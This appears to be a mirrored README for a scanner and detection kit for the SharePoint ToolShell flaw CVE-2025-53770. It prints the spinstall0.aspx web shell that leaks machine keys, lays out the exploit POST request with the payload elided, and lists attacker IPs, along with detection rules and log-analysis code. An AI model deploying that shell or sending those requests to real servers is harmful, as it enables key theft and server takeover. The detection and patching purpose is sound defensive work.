PoC details: d57ac43b4667d6681347b74dc1fdd620696683d6

Source
Related vulnerability
Title: Microsoft SharePoint Server security vulnerability (CVE-2025-53770)
Description: Microsoft SharePoint Server is a collaboration platform from Microsoft (USA). Microsoft SharePoint Server contains a security vulnerability that stems from deserialization of untrusted data and may lead to remote code execution.
Description
ToolShell scanner - CVE-2025-53770 and detection information
Introduction
# CVE-2025-53770 SharePoint Vulnerability Scanner

Put together entirely from the tweets circulating with payloads and different attacks, so it comes with zero warranty. The scanner is designed to identify vulnerable instances, ships with a config of exploitation techniques observed in the wild, and is primarily intended for defensive use: finding vulnerable instances so you can patch them.

This scanner performs automated checks of SharePoint deployments by:
- Sending crafted POST requests to SharePoint ToolPane endpoints with exploit payloads
- Detecting machine key extraction attempts and successful exploitation
- Identifying secondary payload deployment (spinstall0.aspx)
- Analyzing responses for vulnerability indicators based on observed attack patterns
- Providing detailed reporting with confidence levels and immediate action alerts
- Supporting concurrent scanning for efficiency

## Key Detection Capabilities

### CRITICAL: Machine Key Extraction Detection
- Detects successful machine key extraction responses
- Identifies ValidationKey, DecryptionKey, and CompatibilityMode exposure
- Recognizes pipe-delimited machine key patterns (ValidationKey|Validation|DecryptionKey|Decryption|CompatibilityMode)
- Triggers immediate action alerts for compromised systems

### Secondary Payload Detection
- Identifies spinstall0.aspx deployment attempts
- Detects C# ASP.NET payload code patterns
- Recognizes System.Web.Configuration.MachineKeySection usage
- Version-specific path detection (`SP2013: WEBSER~1\15\ vs SP2016+: WEBSER~1\16\`)

## Installation

1. Clone the repository:
```bash
git clone https://github.com/ZephrFish/CVE-2025-53770-Scanner
cd CVE-2025-53770-Scanner
```

2. Install dependencies:
```bash
pip install -r requirements.txt
```

## Usage

### Basic Usage

Create a text file with target hosts (one per line):
```
sharepoint1.example.com
sharepoint2.example.net
internal-sp.company.local
```

Run the scanner:
```bash
python3 scanner.py -i hosts.txt

python3 scanner.py -i hosts.txt -o results.json -l scan.log -t 20 -v
```

### Command Line Options

| Option | Description | Default |
|--------|-------------|---------|
| `-i, --input` | Path to host list file (required) | - |
| `-o, --output` | Output file for results (.json, .csv, .txt) | None |
| `-l, --logfile` | Log file path for detailed logging | None |
| `-t, --threads` | Number of concurrent threads | 10 |
| `-v, --verbose` | Enable verbose output and logging | False |

### Output Formats

#### JSON Output (`-o results.json`)
```json
[
  {
    "host": "sharepoint.example.com",
    "url": "https://sharepoint.example.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx",
    "scan_time": "2025-07-21T10:30:00.123456",
    "vulnerable": true,
    "status_code": 200,
    "response_size": 15432,
    "error": null,
    "response_time": 1.23
  }
]
```

#### CSV Output (`-o results.csv`)
Provides tabular data suitable for spreadsheet analysis with columns for all scan metrics.

#### Text Output (`-o results.txt`)
Human-readable format with vulnerability status and scan details.

## Vulnerability Details

**CVE-2025-53770** is a deserialization vulnerability in SharePoint's ExcelDataSet component that has been actively exploited in the wild. The scanner detects:

### Identified Attack Patterns
1. **Initial Exploitation**: POST request to `/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx` with serialized payload
2. **Machine Key Extraction**: Successful exploitation returns pipe-delimited machine configuration:
   ```
   ValidationKey|Validation|DecryptionKey|Decryption|CompatibilityMode
   Example: [128-256 hex chars]|HMACSHA256|[48-96 hex chars]|AES|Framework45
   ```
3. **Secondary Payload**: Deployment of `spinstall0.aspx` for persistent access and key extraction
4. **Version Targeting**: Different paths for SharePoint versions (15/ vs 16/ layouts)

### Confirmed IOCs from Active Exploitation
- **User-Agent**: `Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0`
- **Referer**: `/_layouts/SignOut.aspx`
- **Content-Length**: Typically 7699-8000+ bytes
- **Payload Size**: Large base64-encoded CompressedDataTable parameters
- **Response Indicators**: Machine key strings, spinstall0.aspx deployment
- **Attack Infrastructure**: 65.38.121.198, 162.243.204.189, 165.22.18.129

### Detection Logic
The scanner analyzes responses for:
1. Machine key extraction patterns (CRITICAL confidence)
2. Secondary payload indicators (HIGH confidence)
3. ExcelDataSet/Scorecard component processing (MEDIUM confidence)
4. ToolPane error patterns and anomalous response characteristics (LOW confidence)
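The four confidence tiers above can be applied to any captured response body, for example one pulled from a proxy or WAF capture during an investigation. The following is an added example, not code from the scanner repository: it implements the tiering as a classifier and, because the README warns that logs may contain sensitive information, summarises a leaked machine key by algorithm and key length rather than copying the key material. The regular expression, marker strings and the sample responses are assumptions constructed from the patterns this README describes.

```python
import re

# Confidence levels in the order the README's detection logic ranks them.
CRITICAL, HIGH, MEDIUM, LOW, NONE = "CRITICAL", "HIGH", "MEDIUM", "LOW", "NONE"

# Pipe-delimited machine-key line as described in the README:
# <hex ValidationKey>|<validation alg>|<hex DecryptionKey>|<decryption alg>|<compatibility mode>
# Lengths follow the README (128-256 and 48-96 hex characters); the lookbehind stops a
# match from starting inside a longer hex run.
MACHINE_KEY_RE = re.compile(
    r"(?<![0-9A-Fa-f])([0-9A-Fa-f]{128,256})\|(HMACSHA256|HMACSHA1|SHA1)\|"
    r"([0-9A-Fa-f]{48,96})\|(AES|DES|3DES)\|(Framework[0-9A-Za-z]+)"
)
# Markers for the HIGH and MEDIUM tiers, taken from the README's indicator lists.
SECONDARY_PAYLOAD_MARKERS = ("spinstall0.aspx", "System.Web.Configuration.MachineKeySection")
COMPONENT_MARKERS = ("ExcelDataSet", "Scorecard")
ERROR_RE = re.compile(r"error|exception", re.IGNORECASE)


def classify_response(body: str) -> str:
    """Return the README's confidence level for one captured HTTP response body."""
    if MACHINE_KEY_RE.search(body):
        return CRITICAL          # machine key material echoed back
    if any(marker in body for marker in SECONDARY_PAYLOAD_MARKERS):
        return HIGH              # secondary payload referenced or echoed
    if any(marker in body for marker in COMPONENT_MARKERS):
        return MEDIUM            # ExcelDataSet/Scorecard component was processed
    if "ToolPane" in body and ERROR_RE.search(body):
        return LOW               # ToolPane error page, anomalous but not conclusive
    return NONE


def extract_machine_key(body: str):
    """Summarise a leaked machine key without writing the secret key material to logs."""
    match = MACHINE_KEY_RE.search(body)
    if match is None:
        return None
    validation_key, validation, decryption_key, decryption, compat = match.groups()
    return {
        "ValidationKeyLength": len(validation_key),
        "Validation": validation,
        "DecryptionKeyLength": len(decryption_key),
        "Decryption": decryption,
        "CompatibilityMode": compat,
    }


# Constructed sample responses (not real captures). The hex strings are filler, not real keys.
LEAKED_KEYS = "A1" * 64 + "|HMACSHA256|" + "B2" * 32 + "|AES|Framework45"
WEBSHELL_ECHO = "<html><body>Uploaded spinstall0.aspx</body></html>"
TOOLPANE_ERROR = "<title>Server Error in ToolPane.aspx</title><p>An unhandled exception occurred.</p>"
BENIGN = "<html><title>SharePoint home</title></html>"

if __name__ == "__main__":
    for name, body in [("leaked", LEAKED_KEYS), ("webshell", WEBSHELL_ECHO),
                       ("error", TOOLPANE_ERROR), ("benign", BENIGN)]:
        print(f"{name:8s} -> {classify_response(body)} {extract_machine_key(body) or ''}")
```

Feed it response bodies from your own captures; anything that lands in the CRITICAL tier means the machine keys must be treated as compromised and rotated, whatever the rest of the investigation finds.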

## Security Considerations

- This tool is designed for **authorized security testing only**
- Ensure proper authorization before scanning any systems
- Scanner uses HTTPS by default but accepts self-signed certificates
- Logs may contain sensitive information - secure appropriately
- Consider network impact when using high thread counts

## Example Scan Session

```bash
$ python3 scanner.py -i corporate-sharepoint.txt -o vuln-results.json -l scan.log -v

Starting scan of 150 hosts with 10 threads...
Target CVE: CVE-2025-53770 (SharePoint ExcelDataSet deserialization)
Logging to: scan.log
Results will be saved to: vuln-results.json

[+] VULNERABLE [CRITICAL]: sp-prod-01.acme.local
[-] Not vulnerable: sp-dev-02.acme.local  
[!] ERROR: offline-sp.acme.local - Connection timeout
[+] VULNERABLE [HIGH]: sp-legacy.acme.local
Progress: 50/150 (33.3%)
Progress: 100/150 (66.7%)
Progress: 150/150 (100.0%)

============================================================
SCAN COMPLETE
============================================================
Total hosts scanned: 150
Vulnerable hosts: 3
Success rate: 97.3%

VULNERABLE HOSTS (CVE-2025-53770):

  CRITICAL - MACHINE KEY EXTRACTED (1 hosts):
    • sp-prod-01.acme.local (Response time: 0.85s, Version: 2016+)
      WARNING: IMMEDIATE ACTION REQUIRED: Machine keys compromised

  HIGH CONFIDENCE (1 hosts):
    • sp-legacy.acme.local (Response time: 1.23s, Version: 2013-2016)

  LOW CONFIDENCE (1 hosts):
    • sp-archive.acme.local (Response time: 2.10s, Version: Unknown)

Detailed results saved to: vuln-results.json
```

## Troubleshooting

### Common Issues

1. **Connection Timeouts**: Increase timeout or reduce thread count
2. **SSL Errors**: Scanner disables SSL warnings by default
3. **Permission Errors**: Ensure write access for output/log files
4. **Memory Usage**: Monitor with large host lists

### Log Analysis

Enable verbose logging (`-v`) and log files (`-l`) for detailed troubleshooting:
```bash
tail -f scan.log
```

## Exploitation Analysis

### Observed Attack Payloads

The scanner incorporates detection for confirmed exploitation patterns observed in active attacks:

#### Primary Payload Structure
```http
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: target.domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 7699
Content-Type: application/x-www-form-urlencoded
Referer: /_layouts/SignOut.aspx
Connection: close

MSOTlPn_Uri=http%3A%2F%2F{{host}}%2F_controltemplates%2F15%2FAclEditor.ascx
&MSOTlPn_DWP=[ExcelDataSet payload with CompressedDataTable containing serialized exploit]
```

#### Secondary Payload (spinstall0.aspx)
```csharp
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script runat="server" language="c#" CODEPAGE="65001">
    public void Page_load()
    {
        var sy = System.Reflection.Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
        var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
        var gac = mkt.GetMethod("GetApplicationConfig", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);
        var cg = (System.Web.Configuration.MachineKeySection)gac.Invoke(null, new object[0]);
        Response.Write(cg.ValidationKey+"|"+cg.Validation+"|"+cg.DecryptionKey+"|"+cg.Decryption+"|"+cg.CompatibilityMode);
    }
</script>
```

#### Expected Machine Key Response Format
```
ValidationKey: [128-256 character hex string]
Validation: HMACSHA256|HMACSHA1|SHA1
DecryptionKey: [48-96 character hex string] 
Decryption: AES|DES|3DES
CompatibilityMode: Framework20SP1|Framework45|Framework40
```

## Detection and Monitoring Guidance

### Detecting CVE-2025-53770 Exploitation Attempts

Organizations should implement the following detection mechanisms to identify potential exploitation attempts:

#### 1. Web Application Firewall (WAF) Rules

Monitor for suspicious POST requests to SharePoint ToolPane endpoints:

```
# Example WAF detection rule patterns
POST /_layouts/15/ToolPane.aspx*
POST /_layouts/*/ToolPane.aspx*
Query string: "DisplayMode=Edit&a=/ToolPane.aspx"
Request body containing: "MSOTlPn_Uri", "MSOTlPn_DWP"
Request body containing: "ExcelDataSet", "CompressedDataTable"
Request body containing: "Scorecard:ExcelDataSet"
Request body containing: "H4sIAAAAAAAEA" (gzip magic bytes in base64)
Content-Length > 5000 bytes (typical payload size)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0)
Referer: /_layouts/SignOut.aspx
```

**Exploitation patterns observed:**
- Payload sizes typically 7000-8000+ bytes
- URL-encoded compressed data in `CompressedDataTable` parameter
- Specific User-Agent string: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0)
- Content-Type: application/x-www-form-urlencoded
- Connection: close header often present
- Base64-encoded serialized .NET objects in payload
- Response contains machine keys in pipe-delimited format
- Secondary requests to deployed spinstall0.aspx files

#### 2. SharePoint ULS Logs

Monitor SharePoint Unified Logging Service (ULS) logs for:

```
Category: SharePoint Foundation Web Controls
Level: Unexpected, Error, Critical
Keywords: "ToolPane", "ExcelDataSet", "Deserialization"
Process: w3wp.exe
```

Key indicators in ULS logs:
- Unexpected exceptions in ToolPane.aspx processing
- Deserialization errors in Microsoft.PerformancePoint components
- Memory corruption or process crashes in w3wp.exe

#### 3. IIS Access Logs

Monitor IIS logs for exploitation patterns:

```
# Log analysis queries (replace with your SIEM syntax)
cs-method="POST" AND cs-uri-stem="/_layouts/15/ToolPane.aspx"
cs-method="POST" AND cs-uri-query="DisplayMode=Edit&a=/ToolPane.aspx"
cs-bytes > 7000 (typical exploit payload size)
cs(User-Agent)="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
cs(Referer)="/_layouts/SignOut.aspx"
sc-status=200 AND time-taken > 5000 (slow processing indicating deserialization)
```

**Specific IOCs from real attacks:**
```
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx
Content-Length: 7699
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Referer: /_layouts/SignOut.aspx
Body contains: MSOTlPn_Uri=http%3A%2F%2F[domain]%2F_controltemplates%2F15%2FAclEditor.ascx
Body contains: CompressedDataTable%3D%22H4sIAAAAAAAEANVa23LbSJLt3stEzMzu0%2F6AQs%2B2BJCiu%2BWQ
```
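The IIS log queries and IOCs above translate directly into a scoring rule over W3C extended log rows. The following is an added example, not part of the scanner repository, written from the defender's side: it parses the `#Fields` header of an IIS log, scores each ToolPane POST against the indicators listed in this README (query string, body size, User-Agent, Referer, slow 200 responses, known infrastructure IPs) and ranks the results so an ordinary administrator editing a web part scores low while an exploit-shaped request scores high. The field list, the score weights and severity thresholds, and the three sample log lines (including the 203.0.113.10 client address) are constructed assumptions.

```python
import re
from dataclasses import dataclass

# Indicators listed in this README's IOC and IIS log sections.
KNOWN_ATTACK_IPS = {"65.38.121.198", "162.243.204.189", "165.22.18.129"}
ATTACK_USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
ATTACK_REFERER = "/_layouts/SignOut.aspx"
TOOLPANE_QUERY = "DisplayMode=Edit&a=/ToolPane.aspx"
TOOLPANE_STEM_RE = re.compile(r"^/_layouts/(?:15|16)/ToolPane\.aspx$", re.IGNORECASE)
SUSPICIOUS_BODY_BYTES = 7000   # cs-bytes threshold from the README
SLOW_REQUEST_MS = 5000         # time-taken threshold from the README


@dataclass
class Finding:
    time: str
    client_ip: str
    score: int
    reasons: list

    @property
    def severity(self) -> str:
        # Assumed thresholds: all request-side indicators together score 10.
        return "HIGH" if self.score >= 7 else "MEDIUM" if self.score >= 4 else "LOW"


def _to_int(value) -> int:
    """IIS writes '-' for missing numeric fields; treat those as 0."""
    try:
        return int(value)
    except (TypeError, ValueError):
        return 0


def parse_w3c(lines):
    """Yield one dict per data row of a W3C extended log, keyed by the names in the #Fields header."""
    fields = None
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("data row encountered before a #Fields header")
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # malformed row; skip rather than misalign the columns
        row = dict(zip(fields, values))
        # IIS substitutes '+' for spaces inside User-Agent and Referer values.
        for key in ("cs(User-Agent)", "cs(Referer)"):
            if key in row:
                row[key] = row[key].replace("+", " ")
        yield row


def score_row(row):
    """Score one ToolPane POST against the README's indicators; None for rows that are not ToolPane POSTs."""
    if row.get("cs-method") != "POST" or not TOOLPANE_STEM_RE.match(row.get("cs-uri-stem", "")):
        return None
    reasons, score = [], 0

    def hit(points, why):
        nonlocal score
        score += points
        reasons.append(why)

    hit(1, "POST to ToolPane.aspx")
    if row.get("cs-uri-query") == TOOLPANE_QUERY:
        hit(2, "DisplayMode=Edit&a=/ToolPane.aspx query")
    if _to_int(row.get("cs-bytes")) > SUSPICIOUS_BODY_BYTES:
        hit(2, f"request body {row['cs-bytes']} bytes")
    if row.get("cs(User-Agent)") == ATTACK_USER_AGENT:
        hit(2, "known attack User-Agent")
    if row.get("cs(Referer)", "").endswith(ATTACK_REFERER):
        hit(2, "Referer /_layouts/SignOut.aspx")
    if row.get("sc-status") == "200" and _to_int(row.get("time-taken")) > SLOW_REQUEST_MS:
        hit(1, "slow 200 response (deserialization in progress)")
    if row.get("c-ip") in KNOWN_ATTACK_IPS:
        hit(3, "known attack infrastructure IP")
    return Finding(f"{row.get('date', '')} {row.get('time', '')}", row.get("c-ip", "-"), score, reasons)


def analyze(lines):
    """Return Findings for every ToolPane POST in the log, highest score first."""
    findings = [f for f in (score_row(r) for r in parse_w3c(lines)) if f is not None]
    return sorted(findings, key=lambda f: f.score, reverse=True)


# Constructed sample log (not a real capture): one exploit-shaped request, one ordinary admin edit, one GET.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status sc-bytes cs-bytes time-taken
2025-07-21 10:30:00 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx 443 - 203.0.113.10 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:120.0)+Gecko/20100101+Firefox/120.0 /_layouts/SignOut.aspx 200 0 0 15432 7699 6120
2025-07-21 10:31:12 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx 443 jsmith 10.0.0.42 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+Chrome/126.0+Safari/537.36 https://sharepoint.example.com/_layouts/15/start.aspx 200 0 0 9800 2100 340
2025-07-21 10:32:00 10.0.0.5 GET /_layouts/15/start.aspx - 443 jsmith 10.0.0.42 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+Chrome/126.0+Safari/537.36 - 200 0 0 5120 412 35
"""

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG.splitlines()):
        print(f"[{f.severity}] {f.time} {f.client_ip} score={f.score}: {', '.join(f.reasons)}")
```

Point `analyze()` at the lines of a real `u_ex*.log` file; the additive score matters more than any single indicator, since the User-Agent and Referer are trivially changed by an attacker while the endpoint, query string and oversized body are inherent to the technique.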

#### 4. Network Traffic Analysis

Monitor network traffic for:
- Unusual POST request sizes to SharePoint servers
- Repeated requests to ToolPane.aspx from single sources
- Base64 encoded payloads in HTTP POST bodies
- Non-browser User-Agent strings targeting SharePoint

#### 5. Windows Event Logs

Monitor Windows Event Logs on SharePoint servers:

```
Event Log: Application
Source: ASP.NET, SharePoint Foundation
Event IDs: 1309, 1310 (application errors)
Event Log: System
Source: Application Error
Process: w3wp.exe crashes
```

#### 6. SIEM Detection Rules

##### Splunk Detection Query:
```spl
index=iis source="*iis*" 
| search cs_method="POST" cs_uri_stem="/_layouts/15/ToolPane.aspx" cs_uri_query="DisplayMode=Edit&a=/ToolPane.aspx"
| eval payload_size=tonumber(cs_bytes)
| where payload_size > 7000
| search cs_User_Agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
| stats count by src_ip, cs_uri_stem, payload_size
| sort -payload_size
```

##### Enhanced Detection for Real Attacks:
```spl
index=iis 
| search cs_method="POST" AND cs_uri_stem="/_layouts/15/ToolPane.aspx"
| where cs_bytes > 7000 AND cs_bytes < 10000
| search cs_Referer="/_layouts/SignOut.aspx"
| eval attack_pattern=if(like(cs_User_Agent, "%Windows NT 10.0; Win64; x64; rv:120.0%"), "CVE-2025-53770", "Other")
| where attack_pattern="CVE-2025-53770"
| table _time, src_ip, cs_uri_query, cs_bytes, sc_status
```

##### Elastic/Kibana Query:
```json
{
  "query": {
    "bool": {
      "must": [
        {"term": {"http.request.method": "POST"}},
        {"term": {"url.path": "/_layouts/15/ToolPane.aspx"}},
        {"term": {"url.query": "DisplayMode=Edit&a=/ToolPane.aspx"}},
        {"range": {"http.request.bytes": {"gte": 7000, "lte": 10000}}},
        {"term": {"user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"}},
        {"term": {"http.request.referrer": "/_layouts/SignOut.aspx"}}
      ]
    }
  }
}
```

##### Sigma Rule for CVE-2025-53770:
```yaml
title: CVE-2025-53770 SharePoint ExcelDataSet Exploitation
id: cve-2025-53770-sharepoint-exploit
description: Detects exploitation attempts of CVE-2025-53770 SharePoint deserialization vulnerability
references:
    - https://github.com/your-repo/CVE-2025-53770-Scanner
author: Security Team
date: 2025/07/21
logsource:
    category: webserver
    product: iis
detection:
    selection:
        cs-method: 'POST'
        cs-uri-stem: '/_layouts/15/ToolPane.aspx'
        cs-uri-query: 'DisplayMode=Edit&a=/ToolPane.aspx'
        cs-bytes|gte: 7000
        cs-bytes|lte: 10000
        cs-User-Agent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0'
        cs-Referer: '/_layouts/SignOut.aspx'
    condition: selection
falsepositives:
    - Legitimate SharePoint administrative activities
level: high
tags:
    - attack.initial_access
    - attack.t1190
    - cve.2025.53770
```

#### 7. Behavioral Indicators

Watch for these post-exploitation behaviors:
- Unusual outbound network connections from SharePoint servers
- New user accounts created in SharePoint or Active Directory
- Unauthorized file uploads or modifications
- Privilege escalation attempts
- Lateral movement to other systems

### Recommended Response Actions

1. **Immediate Response:**
   - Block suspicious source IPs at firewall/WAF
   - Isolate affected SharePoint servers if exploitation confirmed
   - Preserve logs and memory dumps for forensic analysis

2. **Investigation:**
   - Analyze POST request payloads for malicious content
   - Check for indicators of successful code execution
   - Review user account activities and permissions changes
   - Correlate with other security events

3. **Containment:**
   - Apply security patches immediately
   - Implement WAF rules to block exploitation attempts
   - Segment SharePoint servers from critical network resources


### SIEM Integration Examples

#### Importing Scan Results into Splunk:
```bash
# Produce scan results as JSON
python3 scanner.py -i hosts.txt -o results.json
# Wrap each result in the {"event": ...} envelope the HEC collector endpoint expects
# (it rejects a bare JSON array), then post the events in one request
jq -c '.[] | {event: .}' results.json | \
  curl -k -H "Authorization: Splunk <token>" -X POST \
  "https://splunk-server:8088/services/collector" \
  --data-binary @-
```
File snapshot

```
/data/pocs/d57ac43b4667d6681347b74dc1fdd620696683d6
├── [4.6K] config.json
├── [ 15K] README.md
├── [  31] requirements.txt
└── [ 40K] scanner.py

0 directories, 4 files
```

Cached for you by the Shenlong bot.
Notes
    1. It is recommended to access the PoC through the source link first.
    2. If the source is no longer available, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has snapshotted this PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.